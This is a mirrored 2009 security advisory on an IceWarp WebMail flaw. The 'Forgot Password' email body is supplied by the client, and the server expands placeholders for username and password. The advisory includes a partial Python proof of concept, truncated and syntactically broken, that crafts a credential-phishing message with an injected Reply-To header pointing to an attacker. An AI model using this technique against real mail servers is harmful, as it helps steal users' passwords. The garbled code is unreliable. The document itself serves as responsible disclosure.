AOH :: HP Unsorted I :: VA3371.HTM

IceWarp WebMail Server: Client-Side Specification of "Forgot Password" eMail Content
IceWarp WebMail Server: Client-Side Specification of "Forgot Password" eMail Content
IceWarp WebMail Server: Client-Side Specification of "Forgot Password" eMail Content

Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Advisory: IceWarp WebMail Server: Client-Side Specification of "Forgot
          Password" eMail Content

During a penetration test, RedTeam Pentesting discovered that the emails
sent by the IceWarp WebMail Server when using the "Forgot Password"
function are generated on the client side. Furthermore, the server
expands certain keywords in these emails to users' full names, usernames
and passwords. This allows for advanced social engineering attacks and
the potential disclosure of usernames and passwords.

Product: IceWarp eMail Server / WebMail Server
Affected Versions: 9.4.1
Fixed Versions: 9.4.2
Vulnerability Type: Unauthorised System Message Manipulation
Security Risk: medium
Vendor URL: 
Vendor Status: notified, fixed version released
Advisory URL: 
Advisory Status: published
CVE: CVE-2009-1469

"Feature complete yet easy to use, WebMail Server Pro provides feature
rich Web 2.0 web-based access to email, calendars, contacts, files and
shared data from any computer with browser and internet connection,
without the usual configuration hassle. Thanks to advanced technologies
and application-like look and feel, Pro suggests it was born to become
the ultimate replacement of Outlook and similar desktop mail clients."

(from the vendor's homepage)

More Details
The IceWarp WebMail Server implements a "Forgot Password" function on
the login page. Users who have forgotten their login password can
provide their email address to the mail server. It will then check if
the email address exists in the system and send the associated user's
password to it.

The HTTP POST request sent when clicking on the "Forgot Password" page's
submit button has a payload similar to the following:

    Z2JK 3WWY
    Your password for %EMAIL%
      Dear %FULLNAME%,
      your login data for webmail are following:

      Username: %USERNAME%
      Password: %PASSWORD%

      This email was sent to: %EMAIL%, %ALTEMAIL%.


The message content of the email is specified with the HTTP POST request
and not on the server side. It is therefore possible to manipulate the
content of the message.

The variables between the percent ("%") character are substituted by the
system with data from the database. The following variables are

%FULLNAME%              Fullname of the user (first name, last name)
%USERNAME%, %USER%      User name
%PASSWORD%              Password of the user's account
%EMAIL%                 Email address
%ALTEMAIL%              Alternative email address
%REMOTEIP%              Remote IP address of the server

By injecting newlines into the subject of the message, it is also
possible to add additional headers to the email. These are however not
parsed by the mail system and will only appear in the web frontend as
headers of the real mail. An example would be to add an additional
"To:", "Cc:" or "Bcc:" header.

Proof of Concept
The following proof of concept code sends an email with a request to
reply to the email to renew the account. The injected "Reply-To" header
will make the reply go the attacker's email address. The variables in
the body will be expanded to the real username and password of the
account. If the users leave the original content of the mail intact when
replying, the attacker will get the login credentials.

#! /usr/bin/env python
import urllib2, sys

conf = {
  "captcha_uid": "5989688782215156001239966846169",
  "captcha": "4SJZ Z4GY",
"forgot": "", 
"replyto": "", 
"server": "" 

data = """

      Dear %FULLNAME%,

      your account

      Username: %USERNAME%
      Password: %PASSWORD%

      has expired. To renew the account, please reply to this email
      leaving the email body intact, so we know the account is still

      Kind regards,

      the IT department

""" % conf

req = urllib2.Request(conf['server'])
res = urllib2.urlopen(req)
print repr(

Do not trust emails even if they contain your valid password. Always
check the address an email is sent to when replying. Preferably, do not
include your login credentials in unencrypted emails.

Upgrade to version 9.4.2.

Security Risk
Client-side specification of the email message text, combined with the
availability of these variables, make elaborate social engineering
attacks possible. Attackers can send emails to users of the email system
and fake knowledge of users' full names, usernames and passwords, adding
credibility. This makes it more likely for users to comply with any
requests made in the email. The risk is therefore regarded as medium.

2009-03-23 Vulnerabilities identified during a penetration test
2009-04-01 Meeting with customer and vendor
2009-04-28 CVE number assigned
2009-05-05 Vendor publishes fixed version
2009-05-05 Advisory released

RedTeam Pentesting GmbH
RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks or products are
uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at 

RedTeam Pentesting GmbH                    Tel.: +49 241 963-1300
Dennewartstr. 25-27                        Fax : +49 241 963-1304
52068 Aachen 
Germany                         Registergericht: Aachen HRB 14004
Gesch=E4ftsf=FChrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck

Content-Type: application/pgp-signature
Content-Disposition: inline

Version: GnuPG v1.4.9 (GNU/Linux)



The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to